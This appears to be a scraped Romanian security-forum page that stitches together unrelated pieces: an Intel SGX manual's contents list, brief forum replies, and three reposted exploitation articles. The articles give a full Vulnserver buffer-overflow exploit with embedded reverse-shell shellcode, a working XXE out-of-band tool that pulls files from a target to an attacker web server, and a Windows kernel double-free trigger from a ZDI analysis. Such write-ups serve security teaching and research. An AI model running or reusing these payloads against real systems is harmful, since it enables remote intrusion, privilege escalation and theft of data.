. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 7-4 7.3.2 Breakpoint Match Reporting during Enclave Execution . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 7-4 7.3.3 Reporting of Code Breakpoint on Next Instruction on a Debug Trap . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 7-4 7.3.4 RFLAGS.RF Treatment on AEX. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 7-4 7.3.5 Breakpoint Matching in SGX Instruction Flows. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 7-4 7.4 INT3 Consideration . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 7-5 7.4.1 Behavior of INT3 inside an Enclave . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 7-5 7.4.2 Debugger Considerations. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 7-5 7.4.3 VMM Considerations . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 7-5 7.5 Branch Tracing . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 7-5 7.5.1 BTF Treatment . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 7-5 7.5.2 LBR Treatment . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 7-5 7.5.2.1 LBR Stack on Opt-in Entry. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 7-5 7.5.2.2 LBR Stack on Opt-out Entry . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 7-6 7.5.2.3 Mispredict Bit, Record Type, and Filtering . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 7-7 7.6 Interaction with Performance Monitoring . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 7-7 7.6.1 IA32_PERF_GLOBAL_STATUS Enhancement . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 7-7 7.6.2 Performance Monitoring with Opt-in Entry . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 7-7 7.6.3 Performance Monitoring with Opt-out Entry . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 7-8 7.6.4 Enclave Exit and Performance Monitoring . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 7-8 7.6.5 PEBS Record Generation on SGX Instructions. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 7-8 7.6.6 Exception-Handling on PEBS/BTS Loads/Stores after AEX . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 7-9 7.6.6.1 Other Interactions with Performance Monitoring . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 7-9 Download: https://software.intel.com/sites/default/files/329298-001.pdf

E posibil sa fie asa: virusul nu trebuie sa fie neaparat extrem de sofisticat dar: 1. Bitdefender o sa il detecteze 2. Ceilalti nu o sa il detecteze Rezultat: Primul loc in AV-Test. Cat despre "Hotul striga uite hotul" e ceva mai gros la mijloc: NSA aka SUA vs Kaspersky aka Rusia.

Nu e Marketing, e un "atac" la adresa SUA.

Vai, dragutii de la SANS... Si certificarile lor de 5000 de $

Uau. Ca sa vezi: Linux kernel are mai multe probleme ca Windows kernel. (Problemele sunt majoritatea comune intre diverse versiuni: 7, 8, 8.1...) Ce sa insemne asta? Oare va da peste cap ideea cu "Dar vai, Linux e mai secure decat Windows" ?

Da, se pare ca vBulletin nu e singurul script cu astfel de probleme. L-a testat cineva?

Da, de la Windows s-a trecut la Mac. Pentru IE sunt deja o gramada de fuzzere, stiam de Chrome ca e in top, dar nu am vazut prea mult tam-tam legat de el...

Am vazut, infosecinstitute a decazut rau de tot.

Ha? Ce sa "facem"? PS: Ai mai mult de 18 ani sau esti la liceu si vrei sa stii pe ce drum vrei sa mergi?

De ce vrei sa stii?

@CarlCasper - Ceva de zis in apararea ta?

Pai arata-ne si noua dovezile.

Exploiting Buffer Overflows Posted by cyberkryption on February 14, 2015 Recently, at the Digital jersey Open Source event, I gave a talk on exploiting a buffer overflow. I used win 7 as a host for the vulnerable Vulnserver application which you can get from the Grey Corner bloghere. The presentation is here, some of the videos are missing. The videos were only a backup if the live demo ran into issues. The final exploit code is shown below, with the steps to achieve it shown afterwards Final Exploit Code [TABLE=width: 917] [TR] [TD=class: gutter] 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 [/TD] [TD=class: code]</pre></pre> <pre>#!/usr/bin/python import socket server = '192.168.43.12' port = 9999 prefix = 'A' * 2006 eip = '\xAF\x11\x50\x62' nopsled = '\x90' * 16 #msfpayload windows/shell_reverse_tcp LHOST=192.168.43.213 LPORT=443 EXITFUNC=thread R | msfencode -b '\x00' -e x86/shikata_ga_nai exploit = ( "\xbb\x7d\x25\x14\xae\xda\xc0\xd9\x74\x24\xf4\x5e\x 33\xc9" + "\xb1\x52\x31\x5e\x12\x03\x5e\x12\x83\x93\xd9\xf6\x 5b\x97" + "\xca\x75\xa3\x67\x0b\x1a\x2d\x82\x3a\x1a\x49\xc7\x 6d\xaa" + "\x19\x85\x81\x41\x4f\x3d\x11\x27\x58\x32\x92\x82\x be\x7d" + "\x23\xbe\x83\x1c\xa7\xbd\xd7\xfe\x96\x0d\x2a\xff\x df\x70" + "\xc7\xad\x88\xff\x7a\x41\xbc\x4a\x47\xea\x8e\x5b\x cf\x0f" + "\x46\x5d\xfe\x9e\xdc\x04\x20\x21\x30\x3d\x69\x39\x 55\x78" + "\x23\xb2\xad\xf6\xb2\x12\xfc\xf7\x19\x5b\x30\x0a\x 63\x9c" + "\xf7\xf5\x16\xd4\x0b\x8b\x20\x23\x71\x57\xa4\xb7\x d1\x1c" + "\x1e\x13\xe3\xf1\xf9\xd0\xef\xbe\x8e\xbe\xf3\x41\x 42\xb5" + "\x08\xc9\x65\x19\x99\x89\x41\xbd\xc1\x4a\xeb\xe4\x af\x3d" + "\x14\xf6\x0f\xe1\xb0\x7d\xbd\xf6\xc8\xdc\xaa\x3b\x e1\xde" + "\x2a\x54\x72\xad\x18\xfb\x28\x39\x11\x74\xf7\xbe\x 56\xaf" + "\x4f\x50\xa9\x50\xb0\x79\x6e\x04\xe0\x11\x47\x25\x 6b\xe1" + "\x68\xf0\x3c\xb1\xc6\xab\xfc\x61\xa7\x1b\x95\x6b\x 28\x43" + "\x85\x94\xe2\xec\x2c\x6f\x65\xd3\x19\x44\xa0\xbb\x 5b\x9a" + "\x4b\x87\xd5\x7c\x21\xe7\xb3\xd7\xde\x9e\x99\xa3\x 7f\x5e" + "\x34\xce\x40\xd4\xbb\x2f\x0e\x1d\xb1\x23\xe7\xed\x 8c\x19" + "\xae\xf2\x3a\x35\x2c\x60\xa1\xc5\x3b\x99\x7e\x92\x 6c\x6f" + "\x77\x76\x81\xd6\x21\x64\x58\x8e\x0a\x2c\x87\x73\x 94\xad" + "\x4a\xcf\xb2\xbd\x92\xd0\xfe\xe9\x4a\x87\xa8\x47\x 2d\x71" + "\x1b\x31\xe7\x2e\xf5\xd5\x7e\x1d\xc6\xa3\x7e\x48\x b0\x4b" + "\xce\x25\x85\x74\xff\xa1\x01\x0d\x1d\x52\xed\xc4\x a5\x72" + "\x0c\xcc\xd3\x1a\x89\x85\x59\x47\x2a\x70\x9d\x7e\x a9\x70" + "\x5e\x85\xb1\xf1\x5b\xc1\x75\xea\x11\x5a\x10\x0c\x 85\x5b" + "\x31" ) brk = '\xcc' padding = 'F' * (3000 - 2006 - 4 - 16 - 1) attack = prefix + eip + nopsled + exploit + brk + padding s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) connect = s.connect((server, port)) print s.recv(1024) print "Sending Evil Buffer to TRUN " s.send(('TRUN .' + attack + '\r\n')) print s.recv(1024) s.send('EXIT\r\n') print s.recv(1024) s.close() <pre>[/TD] [/TR] [/TABLE] The stages of code used to achieve remote code execution are shown below. Code 1 – Initial Crash [TABLE=width: 549] [TR] [TD=class: gutter] 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 [/TD] [TD=class: code]</pre> #!/usr/bin/python import socket server = '192.168.43.12' port = 9999 length = int(raw_input('Length of attack: ')) s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) connect = s.connect((server, port)) print s.recv(1024) print "Sending attack length ", length, ' to TRUN .' attack = 'A' * length s.send(('TRUN .' + attack + '\r\n')) print s.recv(1024) s.send('EXIT\r\n') print s.recv(1024) s.close() <pre>[/TD] [/TR] [/TABLE] Code 2 – Cyclic Pattern to locate EIP [TABLE=width: 19925] [TR] [TD=class: gutter] 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 [/TD] [TD=class: code]</pre> #!/usr/bin/python import socket server = '192.168.43.12' port = 9999 s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) connect = s.connect((server, port)) print s.recv(1024) print "Sending Evil Buffer to TRUN ." attack = "Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab 6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2A d3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9 Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag 6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2A i3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9 Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al 6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2A n3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9 Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq 6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2A s3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9 Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av 6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2A x3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9 Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba 6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2B c3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9 Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf 6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2B h3Bh4Bh5Bh6Bh7Bh8Bh9Bi0Bi1Bi2Bi3Bi4Bi5Bi6Bi7Bi8Bi9 Bj0Bj1Bj2Bj3Bj4Bj5Bj6Bj7Bj8Bj9Bk0Bk1Bk2Bk3Bk4Bk5Bk 6Bk7Bk8Bk9Bl0Bl1Bl2Bl3Bl4Bl5Bl6Bl7Bl8Bl9Bm0Bm1Bm2B m3Bm4Bm5Bm6Bm7Bm8Bm9Bn0Bn1Bn2Bn3Bn4Bn5Bn6Bn7Bn8Bn9 Bo0Bo1Bo2Bo3Bo4Bo5Bo6Bo7Bo8Bo9Bp0Bp1Bp2Bp3Bp4Bp5Bp 6Bp7Bp8Bp9Bq0Bq1Bq2Bq3Bq4Bq5Bq6Bq7Bq8Bq9Br0Br1Br2B r3Br4Br5Br6Br7Br8Br9Bs0Bs1Bs2Bs3Bs4Bs5Bs6Bs7Bs8Bs9 Bt0Bt1Bt2Bt3Bt4Bt5Bt6Bt7Bt8Bt9Bu0Bu1Bu2Bu3Bu4Bu5Bu 6Bu7Bu8Bu9Bv0Bv1Bv2Bv3Bv4Bv5Bv6Bv7Bv8Bv9Bw0Bw1Bw2B w3Bw4Bw5Bw6Bw7Bw8Bw9Bx0Bx1Bx2Bx3Bx4Bx5Bx6Bx7Bx8Bx9 By0By1By2By3By4By5By6By7By8By9Bz0Bz1Bz2Bz3Bz4Bz5Bz 6Bz7Bz8Bz9Ca0Ca1Ca2Ca3Ca4Ca5Ca6Ca7Ca8Ca9Cb0Cb1Cb2C b3Cb4Cb5Cb6Cb7Cb8Cb9Cc0Cc1Cc2Cc3Cc4Cc5Cc6Cc7Cc8Cc9 Cd0Cd1Cd2Cd3Cd4Cd5Cd6Cd7Cd8Cd9Ce0Ce1Ce2Ce3Ce4Ce5Ce 6Ce7Ce8Ce9Cf0Cf1Cf2Cf3Cf4Cf5Cf6Cf7Cf8Cf9Cg0Cg1Cg2C g3Cg4Cg5Cg6Cg7Cg8Cg9Ch0Ch1Ch2Ch3Ch4Ch5Ch6Ch7Ch8Ch9 Ci0Ci1Ci2Ci3Ci4Ci5Ci6Ci7Ci8Ci9Cj0Cj1Cj2Cj3Cj4Cj5Cj 6Cj7Cj8Cj9Ck0Ck1Ck2Ck3Ck4Ck5Ck6Ck7Ck8Ck9Cl0Cl1Cl2C l3Cl4Cl5Cl6Cl7Cl8Cl9Cm0Cm1Cm2Cm3Cm4Cm5Cm6Cm7Cm8Cm9 Cn0Cn1Cn2Cn3Cn4Cn5Cn6Cn7Cn8Cn9Co0Co1Co2Co3Co4Co5Co 6Co7Co8Co9Cp0Cp1Cp2Cp3Cp4Cp5Cp6Cp7Cp8Cp9Cq0Cq1Cq2C q3Cq4Cq5Cq6Cq7Cq8Cq9Cr0Cr1Cr2Cr3Cr4Cr5Cr6Cr7Cr8Cr9 Cs0Cs1Cs2Cs3Cs4Cs5Cs6Cs7Cs8Cs9Ct0Ct1Ct2Ct3Ct4Ct5Ct 6Ct7Ct8Ct9Cu0Cu1Cu2Cu3Cu4Cu5Cu6Cu7Cu8Cu9Cv0Cv1Cv2C v3Cv4Cv5Cv6Cv7Cv8Cv9Cw0Cw1Cw2Cw3Cw4Cw5Cw6Cw7Cw8Cw9 Cx0Cx1Cx2Cx3Cx4Cx5Cx6Cx7Cx8Cx9Cy0Cy1Cy2Cy3Cy4Cy5Cy 6Cy7Cy8Cy9Cz0Cz1Cz2Cz3Cz4Cz5Cz6Cz7Cz8Cz9Da0Da1Da2D a3Da4Da5Da6Da7Da8Da9Db0Db1Db2Db3Db4Db5Db6Db7Db8Db9 Dc0Dc1Dc2Dc3Dc4Dc5Dc6Dc7Dc8Dc9Dd0Dd1Dd2Dd3Dd4Dd5Dd 6Dd7Dd8Dd9De0De1De2De3De4De5De6De7De8De9Df0Df1Df2D f3Df4Df5Df6Df7Df8Df9Dg0Dg1Dg2Dg3Dg4Dg5Dg6Dg7Dg8Dg9 Dh0Dh1Dh2Dh3Dh4Dh5Dh6Dh7Dh8Dh9Di0Di1Di2Di3Di4Di5Di 6Di7Di8Di9Dj0Dj1Dj2Dj3Dj4Dj5Dj6Dj7Dj8Dj9Dk0Dk1Dk2D k3Dk4Dk5Dk6Dk7Dk8Dk9Dl0Dl1Dl2Dl3Dl4Dl5Dl6Dl7Dl8Dl9 Dm0Dm1Dm2Dm3Dm4Dm5Dm6Dm7Dm8Dm9Dn0Dn1Dn2Dn3Dn4Dn5Dn 6Dn7Dn8Dn9Do0Do1Do2Do3Do4Do5Do6Do7Do8Do9Dp0Dp1Dp2D p3Dp4Dp5Dp6Dp7Dp8Dp9Dq0Dq1Dq2Dq3Dq4Dq5Dq6Dq7Dq8Dq9 Dr0Dr1Dr2Dr3Dr4Dr5Dr6Dr7Dr8Dr9Ds0Ds1Ds2Ds3Ds4Ds5Ds 6Ds7Ds8Ds9Dt0Dt1Dt2Dt3Dt4Dt5Dt6Dt7Dt8Dt9Du0Du1Du2D u3Du4Du5Du6Du7Du8Du9Dv0Dv1Dv2Dv3Dv4Dv5Dv6Dv7Dv8Dv9" s.send(('TRUN .' + attack + '\r\n')) print s.recv(1024) s.send('EXIT\r\n') print s.recv(1024) s.close() <pre>[/TD] [/TR] [/TABLE] Code 3 – Convert.sh used to convert Hex to ASCII [TABLE=width: 549] [TR] [TD=class: gutter] 1 2 3 4 5 6 7 [/TD] [TD=class: code]</pre> TESTDATA=$(echo '0x38.0x43.0x6F.0x39' | tr '.' ' ') for c in $TESTDATA; do echo $c | xxd -r done echo ""</pre> <pre><pre>[/TD] [/TR] [/TABLE] Code 4 - Confirm EIP location in Buffer [TABLE=width: 549] [TR] [TD=class: gutter] 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 [/TD] [TD=class: code]</pre> #!/usr/bin/python import socket server = '192.168.43.12' sport = 9999 prefix = 'A' * 2006 eip = 'BBBB' padding = 'F' * (3000 - 2006 - 4) attack = prefix + eip + padding s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) connect = s.connect((server, sport)) print s.recv(1024) print "Sending Buffer to TRUN " s.send(('TRUN .' + attack + '\r\n')) print s.recv(1024) s.send('EXIT\r\n') print s.recv(1024) s.close() </pre> <pre><pre>[/TD] [/TR] [/TABLE] Code 5 - Confirming JMP ESP [TABLE=width: 549] [TR] [TD=class: gutter] 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 [/TD] [TD=class: code]</pre></pre> <pre>#!/usr/bin/python import socket server = '192.168.43.12' port = 9999 prefix = 'A' * 2006 eip = '\xAF\x11\x50\x62' nopsled = '\x90' * 16 brk = '\xcc' padding = 'F' * (3000 - 2006 - 4 - 16 - 1) attack = prefix + eip + nopsled + brk + padding s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) connect = s.connect((server, port)) print s.recv(1024) print "Sending Evil Buffer to TRUN " s.send(('TRUN .' + attack + '\r\n')) print s.recv(1024) s.send('EXIT\r\n') print s.recv(1024) s.close() </pre> <pre><pre>[/TD] [/TR] [/TABLE] Code 6 - Bad Characters [TABLE=width: 944] [TR] [TD=class: gutter] 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 [/TD] [TD=class: code]</pre></pre> <pre>#!/usr/bin/python import socket server = '192.168.43.12' port = 9999 prefix = 'A' * 2006 eip = '\x42\x42\x42\x42' nopsled = '\x90' * 16 badchars = ( "\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x 0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19 \x1a\x1b\x1c\x1d\x1e\x1f" "\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x 2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38 \x39\x3a\x3b\x3c\x3d\x3e\x3f\x40" "\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x 4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59 \x5a\x5b\x5c\x5d\x5e\x5f" "\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x 6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78 \x79\x7a\x7b\x7c\x7d\x7e\x7f" "\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x 8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98 \x99\x9a\x9b\x9c\x9d\x9e\x9f" "\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\x ac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8 \xb9\xba\xbb\xbc\xbd\xbe\xbf" "\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\x cc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8 \xd9\xda\xdb\xdc\xdd\xde\xdf" "\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\x ec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8 \xf9\xfa\xfb\xfc\xfd\xfe\xff" ) brk = '\xcc' padding = 'F' * (3000 - 2006 - 4 - 16 - 1) attack = prefix + eip + nopsled + badchars + brk + padding s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) connect = s.connect((server, port)) print s.recv(1024) print "Sending Evil Buffer to TRUN " s.send(('TRUN .' + attack + '\r\n')) print s.recv(1024) s.send('EXIT\r\n') print s.recv(1024) s.close() </pre> <pre><pre>[/TD] [/TR] [/TABLE] That’s All Folks….! Sursa: https://cyberkryption.wordpress.com/2015/02/14/exploiting-buffer-overflows/

Exploiting Xxe With Out of Band Channels Hey, this post is about a cool technique that was at Blackhat EU in 2013, By Alexey Osipov & Timur Yunusov. The idea is basically to use recursive external entity injection to have the vulnerable application send a http request to an attackers web server with the contents of a file of their choice. This works by reading the file and adding it as a payload to the end of url, we then try to load this as an external entity so if we look in the log files of the web server we can see the files contents so long as it can be rendered as plaintext or xml.In the video they talk about a metasploit module that can be used to exploit this, we needed it to exploit soapsonar, however I didn’t have any luck finding it so myself and Rob decided we would build our own. Ok, so the code isn’t very good, I’m not a programmer by any stretch of the imagination but it does work. Here is a video of us using it exploit a real application: #[Authors]: Ben 'highjack' Sheppard (@highjack_) & Rob Daniel (@_drxp)#[Title]: XXE OOB file retriever #[Usage]: sudo python xxeoob.py localfile #[Special Thanks]: Alexey Osipov (@GiftsUngiven), Timur Yunusov (@a66at) thanks for the awesome OOB techniques and Dade Murphy import BaseHTTPServer, argparse, socket, sys, urllib, os, ntpath localPort = 0 localIP = "" localFile = "" def status(message): print "\033[0;31;1m[\033[0;34;1m+\033[0;31;1m] \033[0;32;1m" + message + "\033[0m" def end(): status("Completed - Press any key to close") raw_input() quit() class MyHandler(BaseHTTPServer.BaseHTTPRequestHandler): print """\033[0;31;1m _ ._ _ , _ ._ (_ ' ( ` )_ .__) ( ( ( ) `) ) _) (__ (_ (_ . _) _) ,__) `~~`\ ' . /`~~` ,::: ; ; :::, ':::::::::::::::' __________/_ __ \____________ \033[0;31;1m[\033[0;34;1m Title\033[0;31;1m] XXE OOB file retriever \033[0;31;1m[\033[0;34;1mAuthors\033[0;31;1m] Ben Sheppard & Rob Daniel\033[0m """ global localIP localIP = socket.gethostbyname(socket.gethostname()) parser = argparse.ArgumentParser() parser.add_argument("file", help="set local file to extract data from", action="store") parser.add_argument("--port", help="port number for web server to listen on", action="store", default=80) parser.add_argument("--iface", help="specify the interface to listen on", action="store", default="eth0") parser.add_argument("--mode", help="print) outputs stage 1\nurl)crafts stage 1 url)", action="store", default="url") args = parser.parse_args() if localIP.startswith("127."): ipCommand = "ifconfig " + args.iface + " | grep -Eo 'inet addr:[0-9]{1,3}.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}' | cut -f 2 -d :" ipOutput = os.popen(ipCommand) localIP = ipOutput.readline().replace("\n","") global localFile localFile = args.file global localPort localPort = int(args.port) global stage1content stage1content = "<?xml version=\"1.0\" encoding=\"utf-8\"?><!DOCTYPE root [<!ENTITY % remote SYSTEM \"http://" + localIP +":" + str(localPort) + "/stage2.xml\">%remote;%int;%trick;]>" if args.mode == "print": status("Printing xml so it can be pasted into vulnerable app:") print stage1content else: status("Malicious xml file is located at http://" + localIP + ":" + str(localPort )+ "/stage1.xml") def log_request(self, *args, **kwargs): pass def do_GET(s): pageContent = "" if "/stage1.xml" in s.path: status("Receiving stage1 request") pageContent = stage1content elif "/stage2.xml" in s.path: status("Receiving stage2 request") global localFile pageContent = "<!ENTITY % payl SYSTEM \"" + localFile + "\"> <!ENTITY % int \"<!ENTITY % trick SYSTEM 'http://" + localIP + ":"+ str(localPort) + "?%payl;'>\">" else: status("Saving contents of " + localFile + " to " + os.path.dirname(os.path.abspath(__file__))) pageContent = "" localFile = ntpath.basename(localFile) fo = open(localFile, "wb") try: fo.write(urllib.unquote(s.path).decode('utf8')); except Exception,e: print str(e) fo.close() status("Completed - Press any key to close") raw_input() try: httpd.server_close() except: pass s.send_response(200) s.send_header("Content-type", "text/html") s.end_headers() s.wfile.write(pageContent) if __name__ == '__main__': server_class = BaseHTTPServer.HTTPServer httpd = server_class(('', localPort), MyHandler) try: httpd.serve_forever() except: pass httpd.server_close() Posted by highjack Sursa: exploiting xxe with out of band channels - highjack

Just another day at the office: A ZDI analyst’s perspective on ZDI-15-030 Matt_Molinyawe| February 19, 2015Post a Comment Matt Molinyawe Security Researcher HP Security Research – Zero Day Initiative Many of us here at the ZDI are blessed to look at the world’s best vulnerability research coming from researchers around the world. For those of us who work at the ZDI, it’s literally nothing but zero-day, every day. And we’re not just saying that. It’s documented by the record number of published vulnerabilities attained last year and is the most for a single year in the history of the Zero Day Initiative program. An interesting case came in through the program in late October from a researcher named n3phos. The report contained vulnerability information affecting the win32k.sys kernel component on Windows 8.1 x64, and examples included in the case were very well-documented and well-written. We recently released an advisory for the case, which is ZDI-15-030 in our system. This is also known as CVE-2015-0058 to MITRE, and was addressed as part of MS15-010 by Microsoft. Here is a write up from the submission which we felt was exceptional and wanted to share with the research community. Let’s start things off with a demo of the Windows Kernel privilege escalation for Windows 8.1 x64: Similar to the old phrase “cleanliness is next to godliness”, this privilege escalation cleaned up after itself to prevent crashing the operating system and attained SYSTEM privileges. The privilege escalation came in with source code with bypasses to ASLR, SMEP, and full continuation of execution. I compiled the source to verify this case. As you can see in the video, this was a pretty straightforward case to look at. Vulnerability Analysis The report had noted that a crash would occur with the following actions taken: hCursorA = CreateCursor( NULL, 1, 1, 4, 4, AndMask, XORMask); hCursorB = CreateCursor( NULL, 1, 1, 4, 4, AndMask, XORMask); linked = CallService( __NR_NtUserLinkDpiCursor, SYSCALL_ARG(hCursorA), SYSCALL_ARG(hCursorB), SYSCALL_ARG(0x30), ); CallService(__NR_NtUserDestroyCursor, SYSCALL_ARG(hCursorB), SYSCALL_ARG(0x0), ); CallService(__NR_NtUserDestroyCursor, SYSCALL_ARG(hCursorA), SYSCALL_ARG(0x0), ); I compiled an executable for this code and ran it in release mode, and a screen appeared called the “Sad Face of Sorrow” (formerly colloquially known as the “Blue Screen of Death”). Figure 1: Sad Face of Sorrow The following crash stack signature appeared in the kernel debugger: Figure 2: The crash stack signature; click upper image to open in new window Looking at the access violation, it appeared that the memory was freed and accessed again by the call to DestroyCursor. Figure 3: The access violation The debug session of the crash verified the researcher’s findings in the report, in which n3phos had noted: There was an attempt made to free a memory location which has already been freed before (double free). This happens during the second call to NtUserDestroyCursor where CursorA gets destroyed and is caused by the reuse of a dangling pointer to the already freed CursorB. By linking CursorA and CursorB together with a call to NtUserLinkDpiCursor, all we have to do in order to hit the double free, is to destroy CursorB before CursorA. And since we have control between the two calls, we can easily replace the freed CursorB. How the cursors are linked The report noted the following about cursors inside of NtUserLinkDpiCursor: Figure 4: A closer look at NtUserLinkDpiCursor (click to open larger image in new tab) LinkDpiCursor takes three arguments -- two valid cursor handles and one dword as a new dpi value. It first checks if the dpi is a multiple of 0x10 and in the range of 0x10 – 0x40. Then GetCursorForDim looks if CursorA’s current dpi is equal to the newly provided dpi. If it is, the function fails. The default 